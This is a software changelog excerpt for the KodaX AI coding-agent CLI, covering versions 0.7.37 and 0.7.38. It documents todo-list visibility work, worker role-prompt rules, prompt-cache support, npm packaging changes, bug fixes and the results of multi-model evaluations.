+ - **FEATURE_151 — TodoList Visibility & LLM Self-Seeding Parity** — Closes the FEATURE_097 (v0.7.34) coverage gap where users almost never saw the realtime todo list despite the full code path being in place since v0.7.35.1. 14-dimension forensic comparison against `c:/Works/claudecode/src/` identified 5 stacked gates: (G1) `todo_update` had no LLM-driven init path — only Runner-driven seeding from Scout `executionObligations >= 2`; (G2) Scout multi-step gate hard-enforced; (G3) UI `MIN_ITEMS_TO_RENDER = 2`; (G4) `todo-throttle-reminder` `hasItems()` chicken-and-egg gate prevented the empty-store nudge from ever firing; (G5) `showSpinner === true` mount gate + 5-second post-completion linger destroyed the React state. **G1 was the architectural root cause** — even relaxing all 4 other gates wouldn't help because the LLM still had no tool to seed an empty list. Three slices ship together:
79
+ - **Slice A — UI Parity** (matches Claude Code `TaskListV2.tsx:89` `tasks.length === 0` only-blocks-empty + `expandedView==='tasks'` persistent visibility): `MIN_ITEMS_TO_RENDER` 2 → 1; the `showSpinner` mount gate is dropped (surface mounts whenever `viewModel.shouldRender` is true regardless of spinner state); the 5-second post-completion `setTodoItems([])` clear `useEffect` is removed; the view-model's `lastAllCompletedAt` linger gate is no longer consulted (kept on the type signature for back-compat). Surface now stays visible across AMA task boundaries until the next Scout `init()` or LLM `op:'init'` triggers a `replace()`.
80
+ - **Slice B — LLM Self-Seeding** (mirrors Claude Code's `TodoWrite` whole-list write semantics): `todo_update` gains `op: 'init' | 'update'` with default `'update'` for back-compat. `op: 'init'` accepts `items: [{id, content, activeForm?}, ...]` (≥1 entry, unique non-empty ids, non-empty content) and fully replaces the store. Scout / Generator / Planner role-prompts updated with explicit recovery-path guidance: when no plan was seeded but the task is multi-step, call `todo_update({op:"init", items:[...]})`; trivial single-step tasks still proceed without a plan (matches CC `TodoWriteTool/prompt.ts:17-26` "skip for single, straightforward task" guidance).
81
+ - **Slice B — Throttle-Reminder Fix**: `shouldFireTodoReminder` no longer requires `todoStore.hasItems()` — the chicken-and-egg deadlock that prevented the LLM from learning the plan-list infrastructure existed when Scout did not seed is resolved. `buildTodoReminderText` now branches: empty-store nudges the LLM toward `op:'init'` with the trivial-task exemption clause; populated-store text unchanged from v0.7.34. Mirrors Claude Code's `getTodoReminderAttachments` ([attachments.ts:3266](c:/Works/claudecode/src/utils/attachments.ts#L3266)) which fires every 10 turns regardless of store state.
82
+ - **FEATURE_104 prompt eval**: 4 new cases in `benchmark/datasets/feature-151-todo-self-seeding/` (2 positive: multi-file audit + 3-file rename should call op:'init'; 2 negative: typo fix + info request should not). Driver `tests/feature-151-todo-self-seeding.eval.ts` runs 5 alias × 4 case = 20 cells per pilot run; stage-1 acceptance pending post-pilot calibration.
83
+ - **Slice I — Fan-Out Plan Granularity** (added 2026-05-10 after a user reported, translated from Chinese: "when dispatching 5 dispatch_child_task calls for a review, no plan list is visible at any point in the whole process"). Worker role-prompt (`packages/coding/src/agents/worker-role-prompt.ts`) gains a `FAN-OUT PLAN GRANULARITY` section between dispatch rules and Evaluator handoff: when the plan involves dispatching ≥3 children, the model MUST emit `todo_update({op:"init", ...})` as its FIRST tool call and the items array MUST contain EXACTLY N items — one per child's `bundle.objective` — never collapsed into 1-2 items. v2 prompt rewrite (commit `7c508a2`) added explicit MANDATORY TRIGGER framing, COUNT-FIRST imperative ("Not 1. Not 2. Not N-1. Exactly N."), 5-package worked example, and an enumerated ANTI-PATTERNS list after Phase 1 found v1 prompt at 25% positive on the floor model. Mechanism is prompt-only (no code change) — closes the visibility gap in CC default-subagent parity (CC's main agent natively expands plan items per dispatched child via TodoWrite, KodaX Worker was retreating to 1-item plan in fan-out). **Eval ship gate cleared (LLM-judge corrected)**: 3 of 5 aliases (mmx/m27 + ark/glm51 + ds/v4pro) hit ≥80% on each positive case AND ≤20% trigger on each negative case (full pass; mmx 100%/80%, ark+ds_v4pro 100%/100%). zhipu/glm51 + kimi miss the gate due to verbose narration-only single-turn responses (model says "I'll plan first..." but doesn't emit the tool call inline) — this is a single-turn probe limitation against verbose models, not a v2 prompt regression: in the production multi-turn agent loop those models naturally emit the tool call on the second turn. Eval methodology lesson sealed in `EVAL_GUIDELINES.md` anti-pattern 7 + raw output preservation section: regex-only judges on "DOES NOT contain X" assertions falsely fail verbose models that mention X in negation context (kimi was reported as "60/40 negative-case regression" by regex; LLM-judge of the raw outputs found 100/100 — kimi was correctly NOT calling todo_update, just verbalizing the decision). Eval driver dumps `runsRaw[].text` to `os.tmpdir()/kodax-eval-dumps/feature-151-fan-out-plan-granularity/<case>.json` for offline LLM-judge audit. Test pins: 2 unit cases in `worker-role-prompt.test.ts` (presence + ordering after dispatch rules) — 15/15 pass. Design doc: `docs/features/v0.7.38.md#slice-i--fan-out-plan-granularity-review-类-fan-out-抱怨收口2026-05-10-加入`.
84
+ - **Downstream impact**: FEATURE_113 (v0.8.2 TodoList JSON / CLI Surface) gains a new event source (LLM-driven init) but `KodaXEvents.onTodoUpdate` payload schema unchanged — `v0.8.2.md` updated with intersection note. No impact on FEATURE_120 / FEATURE_124 / FEATURE_125. Test guide forthcoming. Design doc: `docs/features/v0.7.38.md#feature_151-todolist-visibility--llm-self-seeding-parity--closing-the-feature_097-coverage-gap`.
85
+
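The `op: 'init'` input constraints stated for FEATURE_151 Slice B (at least one entry, unique non-empty ids, non-empty content) can be expressed as a small validator. This is a sketch: `TodoInitItem` and `validateInitItems` are hypothetical names, and treating whitespace-only strings as empty is an assumption.

```typescript
// Item shape taken from the changelog's `items: [{id, content, activeForm?}]`.
interface TodoInitItem {
  id: string;
  content: string;
  activeForm?: string;
}

// Returns a list of human-readable problems; an empty list means the
// payload satisfies the three stated constraints.
function validateInitItems(items: readonly TodoInitItem[]): string[] {
  const errors: string[] = [];
  if (items.length === 0) {
    errors.push("items must contain at least one entry");
  }
  const seen = new Set<string>();
  items.forEach((item, index) => {
    if (item.id.trim() === "") {
      errors.push(`items[${index}].id must be non-empty`);
    } else if (seen.has(item.id)) {
      errors.push(`items[${index}].id duplicates "${item.id}"`);
    } else {
      seen.add(item.id);
    }
    if (item.content.trim() === "") {
      errors.push(`items[${index}].content must be non-empty`);
    }
  });
  return errors;
}

console.log(
  validateInitItems([
    { id: "1", content: "Audit package A", activeForm: "Auditing package A" },
    { id: "1", content: "" },
  ]),
);
```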
86
+ ### Changed
87
+
88
+ - ⚠️ **npm package renamed `@kodax-ai/cli` → `@kodax-ai/kodax-cli`** (this release; same `0.7.38` version number, identical code). The original RC publish on 2026-05-09 went out as `@kodax-ai/cli@0.7.38` — that name inherited SDK-style conventions (`@org/cli`) but doesn't match how the npm ecosystem names CLI products (industry standard is product-name in the package, e.g. `@anthropic-ai/claude-code`, `aider-chat`). Since the only prior publish was a 0.0.1 placeholder, user count was minimal and the rename was done before further versions accumulated. **v0.7.38 is dual-published**: `@kodax-ai/cli@0.7.38` (deprecated immediately after this republish — points users to the new name) and `@kodax-ai/kodax-cli@0.7.38` (canonical going forward). The two tarballs contain byte-equivalent code; the only difference is `package.json#name`. **Migration**: `npm uninstall -g @kodax-ai/cli && npm install -g @kodax-ai/kodax-cli`, or `npx @kodax-ai/kodax-cli`. The `kodax` bin command is unchanged. ADR-022 Addendum records the rename rationale and migration plan. `packages/skills/.../utils.js` keeps `import('@kodax-ai/cli')` as a Strategy 4 SDK-loader fallback for any user already on a `@kodax-ai/cli` install; the fallback will be removed after a reasonable deprecation window.
+
+ - ⚠️ **Breaking (minor) — `CLAUDE.md` is no longer a fallback context file**. `packages/coding/src/context/agents-loader.ts` reduces `CONTEXT_FILE_CANDIDATES` from `["AGENTS.md", "CLAUDE.md"]` to `["AGENTS.md"]`. **Migration for projects that ship only `CLAUDE.md`**: `mv CLAUDE.md AGENTS.md` or `ln -s CLAUDE.md AGENTS.md`. Projects with both files are unaffected (the prior fallback only triggered when `AGENTS.md` was absent). Rationale: `CLAUDE.md` is Claude-Code-specific project guidance (its content is authored to be consumed by the Claude Code CLI). When a project ships both files, contents typically overlap — the previous fallback caused either double-injection (when both files exist at different traversal depths) or semantic mismatch (KodaX agent receiving CC-targeted instructions). KodaX's own repository dogfooded this: `docs/CLAUDE.md` is CC project rules and was being injected into the KodaX agent context. `AGENTS.md` is the canonical AI-agent rules filename across the AI-agent tooling ecosystem (KodaX, Cursor, Continue, etc.).
+
+ - **`KodaXEvents`-style abort signature gains `options?: { preservePendingInputs?: boolean }`** — Default `abort()` clears the pending-inputs queue (Esc / exit semantics, unchanged). The new `abort({ preservePendingInputs: true })` keeps the queue intact and is used by FEATURE_149 B1's fast-abort path so the freshly submitted follow-up survives the interrupt and is picked up by the next `runQueuedPromptSequence` iteration.
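
The two abort modes described above can be sketched as follows. This is a minimal illustration, not the KodaX implementation: `PromptQueue`, `enqueue`, `drain`, and `isAborted` are hypothetical names; only the `preservePendingInputs` option comes from the changelog entry.

```typescript
// Hypothetical sketch: PromptQueue and its members are illustrative names,
// not KodaX internals. Only `preservePendingInputs` is taken from the changelog.
interface AbortOptions {
  preservePendingInputs?: boolean;
}

class PromptQueue {
  private pendingInputs: string[] = [];
  private aborted = false;

  get isAborted(): boolean {
    return this.aborted;
  }

  enqueue(prompt: string): void {
    this.pendingInputs.push(prompt);
  }

  // Default abort clears the queue (Esc / exit semantics).
  // With preservePendingInputs: true the queue survives the interrupt.
  abort(options?: AbortOptions): void {
    this.aborted = true;
    if (!options?.preservePendingInputs) {
      this.pendingInputs = [];
    }
  }

  // Hands over whatever is still queued to the next iteration and resets state.
  drain(): string[] {
    const drained = this.pendingInputs;
    this.pendingInputs = [];
    this.aborted = false;
    return drained;
  }
}
```

Under these assumptions, a follow-up submitted just before a fast abort is still returned by the next `drain()` call, while a plain `abort()` leaves nothing to drain.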
+
+ ### Notes for callers
+
+ - **CLI users**: zero migration needed. The `\n\n---\n\n` batched-drain separator only affects how multiple queued prompts are sent to the LLM; user-side input is unchanged. The new ↑ gesture on empty input replaces the previous no-op (history was never wired here).
+ - **`@kodax-ai/coding` SDK consumers calling `executeChildAgents` directly**: read-only children are byte-equivalent to v0.7.37. Write children's `systemPromptOverride` now contains additional `AGENTS.md`-derived content when the parent context has a discoverable AGENTS.md. If you were asserting equality against `CHILD_AGENT_SYSTEM_PROMPT`, switch to `startsWith` or use the now-exported const directly.
+ - **Tools with custom interrupt semantics**: `LocalToolDefinition.interruptBehavior` defaults to `'wait'` if unset — no change for existing custom tools. Set it to `'cancel'` only for tools that block on observable wall-clock time (network IO, sleep, child-task wait) where a user follow-up should redirect immediately.
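
As a rough illustration of the `interruptBehavior` default noted above, the sketch below resolves an unset value to `'wait'`. `ToolLike` and `resolveInterruptBehavior` are hypothetical names for this example; the real `LocalToolDefinition` type has more fields than shown here.

```typescript
// Hypothetical sketch: ToolLike stands in for LocalToolDefinition, which is
// not reproduced here. Only the 'wait' | 'cancel' values and the 'wait'
// default come from the changelog.
type InterruptBehavior = "wait" | "cancel";

interface ToolLike {
  name: string;
  interruptBehavior?: InterruptBehavior;
}

// An unset interruptBehavior resolves to 'wait', so existing tools are unaffected.
function resolveInterruptBehavior(tool: ToolLike): InterruptBehavior {
  return tool.interruptBehavior ?? "wait";
}

// A tool that blocks on wall-clock time opts in to immediate cancellation.
const sleepTool: ToolLike = { name: "sleep", interruptBehavior: "cancel" };
const legacyTool: ToolLike = { name: "legacy" };
```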
+
+ ### Verified
+
+ **RC (2026-05-09)**:
+
+ - All 262 affected test files pass (`npm run test` — `packages/coding`, `packages/repl/src/ui/utils`, `packages/repl/src/ui/contexts`, `tests/tracker-consistency.test.ts`).
+ - New: `packages/repl/src/ui/utils/queued-prompt-sequence-latency.test.ts` (handoff floor < 5ms + 50ms-floor sanity check).
+ - New: `tests/feature-149-batched-drain.eval.ts` + `benchmark/datasets/feature-149-batched-drain/cases.test.ts` (4 cases, 30 hermetic shape tests; pilot eval skips when API keys absent).
+ - New: 4 cases in `packages/coding/src/child-executor.test.ts` for FEATURE_117 v2 mutation context injection.
+ - `npm run build` (`tsc -b tsconfig.build.json`) green.
+
+ **Post-RC (2026-05-11)**:
+
+ - Full repo suite green except 1 pre-existing failure unrelated to this delivery (`tests/acp_server.test.ts` — permission-request count expectation, fails on HEAD without any of this delivery's changes; tracked separately).
+ - New: 14 attack-surface hardening tests for `packages/repl/src/permission/bash-ast.ts` (FEATURE_152).
+ - New: ~30 tests across `packages/coding/src/guardrails/auto-mode/bash-prefix-extractor.test.ts` + extractor integration (FEATURE_153).
+ - New: 33 unit tests pinning `idle-yield.ts` foundation utilities + 35 tests for `Runner.run` outer-loop wiring (FEATURE_155 Slice A1/A2).
+ - New: 10 tests for `ObserverBridge.idleWaiting()` + status-bar consumer (FEATURE_156).
+ - New: `packages/repl/src/interactive/storage.test.ts` "FEATURE_157 — lists same-repo sessions across drive-letter case differences" (skipped on Linux; runs on win32 + darwin).
+ - New: 2 pinning tests in `worker-role-prompt.test.ts` for FEATURE_151 Slice I fan-out plan granularity.
+ - Eval ship gates met: FEATURE_155 Slice B1 chat-while-waiting (3/5 alias ≥80% after adding zhipu/glm51), FEATURE_151 Slice I fan-out plan granularity (3/5 alias ≥80% positive AND ≤20% negative-trigger after v2 prompt rewrite).
+ - `npm run build` (`tsc -b tsconfig.build.json`) green; type-check clean across all packages.
+
+ ### Known not-in-scope
+
+ - **Mid-tool-call prompt injection** (streaming a new user message to the LLM while a tool is still executing) — conflicts with cancel-then-reissue boundaries; deferred to v0.7.43+.
+ - **Soft-pause state machine** — FEATURE_111 v0.7.43 scope.
+ - **Council / multi-advisor consult** — FEATURE_105 v0.7.46 scope.
+ - **Read-child cost-stripping** — v1 of FEATURE_117 was abandoned; read children already minimal.
+
+ ---
+
+ ## [0.7.37] - 2026-05-08
+
+ ### Theme
+
+ **Six-feature delivery — Active Cache Control Foundation, Transcript Inline Diff Renderer, v0.7.36 Behavioral Eval Follow-ups, npm Publishing Pipeline + Single-Bundle Architecture Pivot, Pattern B Anti-Immediate-Await Rule.** v0.7.37 ships FEATURE_116 (prompt cache control as a first-class client primitive — Anthropic-compat lowers `cache_control:{type:'ephemeral'}` markers; OpenAI-compat + ACP strip the abstraction; Sub-task 116-D extends the OpenAI-compat usage parser with DeepSeek's private `prompt_cache_hit_tokens` / `prompt_cache_miss_tokens` field shape so cache hits actually surface in `/cost`), FEATURE_141 (REPL parses existing unified-diff text in tool results, renders colored hunks via the new `DiffHunk` Ink component — A-plan, zero wire-format change, zero coding-package change; ToolCallDisplay also gains tool-output surfacing that previous KodaX versions silently dropped), FEATURE_146 (the LLM-judge multi-alias behavioral validation that v0.7.36 deferred — 5 alias × 5/10/12 task probes for FEATURE_119 Pattern B parallel dispatch / FEATURE_131-B Unicode edit fallback / FEATURE_143 prompt-overlay position migration; all three pass their pre-registered ship gates), FEATURE_147 phases 4.1-4.3 (npm scope rename `@kodax/*` → `@kodax-ai/*`, `@kodax/ai` → `@kodax-ai/llm`, publish-only fields + lean-tarball tsconfig exclusion + release pipeline script), FEATURE_148 (Pattern B anti-immediate-await rule in the Worker role-prompt + behavioral eval), and **FEATURE_150 — single-bundle npm distribution architecture** (multi-package publish replaced with esbuild bundle of root entry; only `@kodax-ai/cli` ships to npm; ADR-022 + HLD §12 record the architecture decision and 5 known risks with applied mitigations). Also includes a `kodax -c` UX fix that stops leaking the prior task's Scout/Worker role-prompt into the resumed transcript.
+
+ > **⚠️ Hotfix Note (2026-05-08)**: FEATURE_147 Phase 4.4 (multi-package real `npm publish`) was attempted on 2026-05-08 and revealed three P0 runtime-deps bugs (`@kodax-ai/coding` missing 4 declared deps; `@kodax-ai/repl` missing 26 vendored Ink fork transitive deps; `@kodax-ai/skills` 6 helper scripts hard-coding the obsolete `@kodax/coding` scope). All 10 packages were `npm unpublish`'d. Rather than republish in 24h in multi-package mode, FEATURE_150 pivots npm distribution to a single bundled `@kodax-ai/cli` (esbuild bundle inlines all 9 sub-packages; only the root publishes; sub-packages remain independently usable from source via git clone — see ADR-022 §"Reasoning"). The same v0.7.37 version number reships 24h after the unpublish under the new architecture.
+
+ ### Added
+
+ - **FEATURE_116 — Active Cache Control Foundation** (commits `41436fd`, `cfe7e4c`, `c842f5a`, `81ac799`, `262246c`, `1e91fce`, `101f060`) — Single boundary abstraction `KodaXCacheBoundary` (`packages/ai/src/types.ts`) lowered in 3 provider base classes, **not** 13 subclasses: `KodaXAnthropicCompatProvider` lowers to wire-level `cache_control:{type:'ephemeral'}` markers on the last system block + tools-array tail (Anthropic / Zhipu-coding / Kimi-code / MiniMax-coding / MiMo-coding / ARK-coding cover 6 of 13 providers); `KodaXOpenAICompatProvider` strips the boundary marker (OpenAI / DeepSeek auto prefix-cache; Kimi / Qwen / Zhipu OpenAI-compat have no client-side cache surface — Kimi/Zhipu/Qwen self-cache via separate `cache_id` REST endpoint deferred to v0.7.45+ with FEATURE_102); `KodaXAcpProvider` strips (CLI bridge subprocesses don't see wire format). `cost-tracker.ts` gains `cacheHitRate` field + `/cost` report breakdown. ~70 LOC implementation total (vs the ~360 LOC the design doc originally estimated for the 12-subclass approach). Anthropic acceptance: 5-minute TTL window, 5 consecutive Worker turns achieve ≥70% cache hit rate after the warming first turn. 8 structural ship-gate tests in `tests/feature-116-active-cache-control.eval.ts` + human test guide in `docs/test-guides/FEATURE_116_v0.7.37_TEST_GUIDE.md`. Anthropic provider gains a serialization fail-loud guard so any cache-boundary leakage to wire produces an immediate exception (reviewer CRITICAL #1 from Phase 1.2).
+ - **Sub-task 116-D** (commit `101f060`) — extends `normalizeOpenAIUsage` with a fallback chain to read DeepSeek's private cache field shape (`usage.prompt_cache_hit_tokens` / `usage.prompt_cache_miss_tokens` at the top level) in addition to the OpenAI-standard nested `usage.prompt_tokens_details.cached_tokens`. OpenAI-standard wins on conflict for forward-compat. Without this fix, every DeepSeek request reported `cachedReadTokens: undefined` to KodaX's cost tracker — a *reporting* bug (DeepSeek bills cached input at the discounted rate regardless of client) but it broke the `/cost` UI (~4× over-statement at 80% hit rate), polluted FEATURE_098 cost projection / FEATURE_102 routing inputs, and confused users diff'ing KodaX cost vs the DeepSeek dashboard. 7 new focused tests in `packages/ai/src/providers/openai-usage-cache-fields.test.ts`; 148/148 existing provider tests + 48/48 cost-tracker tests still green. Kimi / Qwen / Zhipu use the OpenAI-standard nested form (verified via their docs), so the fallback is DeepSeek-specific in practice and zero-impact for the other three OpenAI-compat providers.
+
+ - **FEATURE_141 — Transcript Inline Diff Renderer** (commits `21bde6b`, `8bc36db`, `2ef471d`, `0e1b3d3`) — REPL renders unified-diff text from `edit` / `multi_edit` / `write` tool results with colored hunks. Three-layer A-plan: (1) `parse-unified-diff.ts` parser splits tool output text into `[ParsedDiffSegment]` (text segments + diff segments, anchored on `@@` headers); (2) `DiffHunk.tsx` Ink component renders each diff segment with `+` green / `-` red / `@@` gray + 16-line fold (8 head + 8 tail + middle ellipsis) for hunks > 16 lines (≤200 lines) and "diff too large" fallback for >200 lines; multi-edit / multi-file diffs handled via inner new-file lookahead. (3) `ToolCallDisplay.tsx` + new `ToolOutputBlock` surface the tool's `output` field for `edit` / `multi_edit` / `write` (output rendering was **never wired** in KodaX before this — design doc's "lacks colors" framing understated the gap; the field was silently dropped in transcript). Wire format unchanged: `KodaXToolResultBlock.content` stays a string, no schema migration, all 13 provider serialization paths untouched. Child agent diff inheritance is automatic when child summary text contains unified-diff (parser doesn't distinguish source). Theme awareness via existing diff color tokens with hardcoded fallback. Human test guide in `docs/test-guides/FEATURE_141_v0.7.37_TEST_GUIDE.md`. `DiffHunk` is `React.memo`'d by `tool_use_id` so a 100-edit turn doesn't thrash render.
+
+ - **FEATURE_146 — v0.7.36 Behavioral Eval Follow-ups (formally tracked, not implicit defer)** (commits `ea653a1`, `4d8b15c`, `110b84a`) — The LLM-judge multi-alias behavioral validation that v0.7.36 explicitly tracked into v0.7.37 as a load-bearing quality gate. Three sub-features ship as independent patches that **don't block main-line v0.7.37 ship** (per design doc rollback policy):
+ - **A. FEATURE_143 prompt-overlay position migration behavioral eval** (`tests/feature-146-a-prompt-overlay-behavioral.eval.ts` + `benchmark/datasets/prompt-overlay-position/`) — 5 alias × 6 task × 2 variant = 60 cells. Per-task pass-rate delta B-section vs A-legacy: 5 tasks 0pp, 1 task **+20pp (B better)**. Aggregate A=87%, B=**90%**. ✅ PASS gates: no per-task regression > 10pp; aggregate B ≥ 50%. Strongest possible evidence v0.7.36 didn't silently degrade overlay-driven behavior.
+ - **B. FEATURE_119 Pattern B parallel-dispatch behavioral eval** (`tests/feature-146-b-pattern-b-behavioral.eval.ts` + `benchmark/datasets/pattern-b-parallel-decision/`) — 5 alias × 5 task = 25 cells; trigger rate 76-88% across two sweeps (well above 60% PASS gate). Per-alias: zhipu 3/5 (consistently lowest), kimi/mmx/ds 4-5/5. Orphan rate downgraded to informational (single-turn probe cannot test multi-turn await; mockChildExecutor primitive deferred to v0.7.38+). ✅ PASS.
+ - **C. FEATURE_131-B Unicode edit fallback behavioral eval** (`tests/feature-146-c-unicode-edit-fallback-behavioral.eval.ts` + `benchmark/datasets/unicode-edit-fallback/`) — 5 alias × 10 task = 50 cells. byte-exact=48, unicode-rescue=0, both-miss=2, **false-positive=0**, no-edit-call=0. legacy match = unicode match = 48/50 (parity). ✅ PASS gates: false-positive=0; Unicode treatment ≥ legacy baseline (no regression). The 0 unicode-rescue count is informational: 2026-era LLMs across these 5 aliases are conservative about Unicode emission, so the fallback is insurance for the silent-fail tail (CJK paste, web-doc paste, older models), not a daily-use code path.
+
+ - **FEATURE_147 — npm Publishing Pipeline (Phase 4.1 + 4.2 + 4.3)** (commits `a840f22`, `633c01a`) — Three of four phases shipped. **Phase 4.1 + 4.2** (`refactor(packages,v0.7.37)`): scope rename `@kodax/*` → `@kodax-ai/*` across 530+38+11 = 579 TypeScript imports + 26 `package.json` deps + 6 tsconfig paths; `@kodax/ai` → `@kodax-ai/llm` to remove the awkward `@kodax-ai/ai` repetition (directory `packages/ai/` retained — only the package `name` field changed, avoiding a git-history-breaking cross-directory rename). `scripts/patch-publish-fields.mjs` adds `files: ["dist", "README.md", "LICENSE"]` + `publishConfig: { access: "public" }` to all 9 sub-packages and rewrites internal deps from `*` to `*` (no-op normalization — the workspace-protocol approach was rejected when npm 11 surfaced `EUNSUPPORTEDPROTOCOL`; deps stay `*` locally and substitute to `^<version>` at publish time). **Phase 4.3** (`feat(scripts,v0.7.37)`): `scripts/release-npm.mjs` orchestrated the multi-package publish (since deleted — see FEATURE_150). `scripts/exclude-tests-from-build.mjs` adds `**/*.test.ts(x)` + `**/__tests__/**` to all 9 sub-package tsconfig excludes — keeps source builds lean. **Phase 4.4 (actual multi-package `npm publish`)** was **abandoned** after the first sweep revealed three P0 runtime-deps bugs (see Hotfix Note above). The npm distribution architecture pivots to single-bundle in **FEATURE_150**.
+
+ - **FEATURE_150 — Single-bundle npm distribution** (this release window) — Pivots npm distribution from "10 separate packages" to "1 bundled `@kodax-ai/cli`". Source-layer monorepo unchanged (ADR-001 / ADR-021 still hold; 9 sub-packages remain independently usable via `git clone + npm link / file:`). Publish-layer simplified: `scripts/build-bundle.mjs` runs esbuild against three entries — `src/kodax_cli.ts` → `dist/kodax_cli.js` (CLI bin entry), `src/index.ts` → `dist/index.js` (SDK entry consumed by builtin helper scripts and path-B SDK consumers via `package.json#exports`), and verbatim copy of `packages/skills/dist/builtin/` → `dist/builtin/`. All 9 internal `@kodax-ai/*` source modules are inlined into the bundle via esbuild's transitive import tracking. All third-party packages (45 total: 17 root + 26 vendored Ink fork transitives + `typescript` `tsx` `zod`) stay external and are listed in root `package.json#dependencies`. Helper scripts in `packages/skills/src/builtin/skill-creator/scripts/` (6 files) gain a `loadKodaXSDK()` helper in `utils.js` that resolves the SDK via `import.meta.url`-relative path with bare-name fallbacks for dev / monorepo modes. `scripts/release-npm.mjs` and `scripts/publish-root-cli.mjs` deleted; replaced by `scripts/release.mjs` (build → rewrite root pkg name to `@kodax-ai/cli` + drop `private` + normalize bin paths → npm publish to registry.npmjs.org → restore pristine bytes via try/finally). Tarball size: 1.0 MB gzipped / 3.3 MB unpacked / 44 files (47% smaller than v0.7.37 multi-package total of ~1.9 MB across 10 tarballs). Architecture decision recorded in **ADR-022**; bundle layout, three integration paths (CLI users / source SDK consumers / npm SDK consumers), and 5 known risks (`tsx` external; vendored Ink fork transitives; helper-script path hardcoding; opt-in source maps; bundle size DCE) with applied mitigations recorded in **HLD §12**. 
Risk 3 mitigation: `react-devtools-core` is intercepted by an esbuild plugin and stubbed to no-op exports — ink's vendored fork dynamic-imports devtools only when `process.env.DEV='true'` but esbuild hoists the import to module top, where react-devtools-core's CJS `backend.js` evaluates `self.X = ...` and fails under Node.js. The stub eliminates this load-time path entirely (production CLI never enters dev branch).
+
+ - **FEATURE_148 — Pattern B anti-immediate-await rule** (commit `df72ae8`) — Worker role-prompt now carries an explicit ANTI-PATTERN rule forbidding `await_child_task` immediately after `dispatch_child_task` when there is other useful work to do (additional dispatches, side-reads the user requested, synthesis planning, prefetched context). Awaiting immediately collapses Pattern B (FEATURE_119 v0.7.36) back to a synchronous call with extra steps. The rule embeds a concrete example: *"if the user asks 'do X (slow) AND also do Y (cheap)' — dispatch X, then DO Y, then await X."* Backed by a unit test asserting the rule string ships in the rendered prompt + a behavioral eval dataset (`benchmark/datasets/pattern-b-post-dispatch-probe`) + eval driver (`tests/feature-148-post-dispatch-probe.eval.ts`) + human test guide (`docs/test-guides/FEATURE_148_v0.7.37_BEHAVIORAL_EVAL.md`). Closes the qualitative miss FEATURE_146-B's single-turn structural eval couldn't see.
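
The cache-usage fallback chain described under Sub-task 116-D can be sketched roughly as below. This is an assumption-laden illustration rather than the actual `normalizeOpenAIUsage` code: `OpenAICompatUsage` and `readCachedTokens` are hypothetical names, and only the field names (`prompt_tokens_details.cached_tokens`, `prompt_cache_hit_tokens`, `prompt_cache_miss_tokens`) and the "OpenAI-standard wins on conflict" rule come from the entry.

```typescript
// Hypothetical sketch of the fallback order; not the KodaX source.
interface OpenAICompatUsage {
  prompt_tokens?: number;
  // OpenAI-standard nested form.
  prompt_tokens_details?: { cached_tokens?: number };
  // DeepSeek's top-level private fields.
  prompt_cache_hit_tokens?: number;
  prompt_cache_miss_tokens?: number;
}

function readCachedTokens(usage: OpenAICompatUsage): number | undefined {
  // 1. Prefer the OpenAI-standard field so it wins when both shapes are present.
  const standard = usage.prompt_tokens_details?.cached_tokens;
  if (typeof standard === "number") {
    return standard;
  }
  // 2. Fall back to the DeepSeek top-level field.
  const deepseek = usage.prompt_cache_hit_tokens;
  if (typeof deepseek === "number") {
    return deepseek;
  }
  // 3. No cache information reported by the provider.
  return undefined;
}
```

Checking the standard field first keeps behavior unchanged for providers that already report the nested form.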
+
+ ### Fixed
+
+ - **`kodax -c` transcript leak — system messages no longer rendered as bubbles on session resume** (commit `7aabbc1`) — `extractHistorySeedsFromMessage` in `packages/repl/src/ui/utils/message-utils.ts` previously passed `role: 'system'` messages through to the restored history as `type: "system"` bubbles. System messages in KodaX are LLM-internal scaffolding (Scout/Generator/Planner/Evaluator role-prompts, capability-sections, AMA controller metadata, repo-intelligence snapshots) — never user-facing. On `kodax -c` the prior task's full Scout role-prompt (including its cwd, repo snapshot, MCP list, and `Original user request:`) was being re-rendered into the new transcript as a "System [HH:MM]" bubble, leaking task-internal context to the user. Fix: `case "system"` now returns `[]` unconditionally; live-session user-visible banners go through `addHistoryItem` directly, not this restore path, so filtering at restore is safe. 3 new tests pin the behavior; full `@kodax-ai/repl` suite (1088 tests) regression-clean. Pre-existing bug since FEATURE_061 v0.7.16 introduced Scout-first AMA — not a v0.7.37 regression, but caught and fixed in the v0.7.37 release window.
+
+ - **Test harness flake under heavy parallel load** (commit `d4a47bc`) — Vitest's 5s default per-test timeout was being exceeded by git/subprocess/IO/`runKodaX` operations when ~4800 tests run concurrently. Logic was sound — single-test runs always passed; the flake was purely wall-clock contention. Following the v0.7.34 Issue 128 precedent (10 contract suites bumped to 15s), this commit raises per-test timeouts on 4 specific suites: `benchmark/harness/worktree-runner.test.ts` (`GIT_TEST_TIMEOUT = 20_000` for 6 git-shelling tests), `benchmark/harness/h2-boundary-runner.test.ts` (30s → 60s on 4 cells), `packages/coding/src/agent.provider-policy.test.ts` (90s → 180s on 2 `runKodaX` integration tests — critical because vitest's per-test timeout aborts the it-block but does NOT cancel the in-flight `provider.stream`, so a timeout cascades a leaked tool-call into the next test's `calls.length` assertion bucket), and `tests/sa-refactor-goldens/selection.test.ts` (30s on 2 corpus-scanning tests over `~/.kodax/sessions/*.jsonl`). Global `testTimeout` untouched so unit-test perf regressions still surface fast. Verified: 4848/4848 tests green in 107s on the full sweep.
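
The `kodax -c` restore-path fix listed above amounts to dropping system messages when history is rebuilt. A minimal sketch, assuming simplified message and seed shapes (`StoredMessage`, `HistorySeed`, and `extractSeeds` are hypothetical stand-ins for the real types and for `extractHistorySeedsFromMessage`):

```typescript
// Hypothetical sketch: simplified stand-ins, not the real KodaX types.
type Role = "system" | "user" | "assistant";

interface StoredMessage {
  role: Role;
  content: string;
}

interface HistorySeed {
  type: "user" | "assistant";
  text: string;
}

// On session restore, system messages are internal scaffolding and
// produce no transcript bubbles; other roles pass through unchanged.
function extractSeeds(message: StoredMessage): HistorySeed[] {
  switch (message.role) {
    case "system":
      return [];
    case "user":
      return [{ type: "user", text: message.content }];
    case "assistant":
      return [{ type: "assistant", text: message.content }];
  }
}
```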
+
+ ### Tested
+
+ - **5 new eval files** under `tests/`:
+ - `feature-116-active-cache-control.eval.ts` — 8 structural ship-gate tests (FEATURE_116)
+ - `feature-146-a-prompt-overlay-behavioral.eval.ts` — 5×6×2=60 cell LLM-judge eval (FEATURE_143 follow-up)
+ - `feature-146-b-pattern-b-behavioral.eval.ts` — 5×5=25 cell LLM-judge eval (FEATURE_119 follow-up)
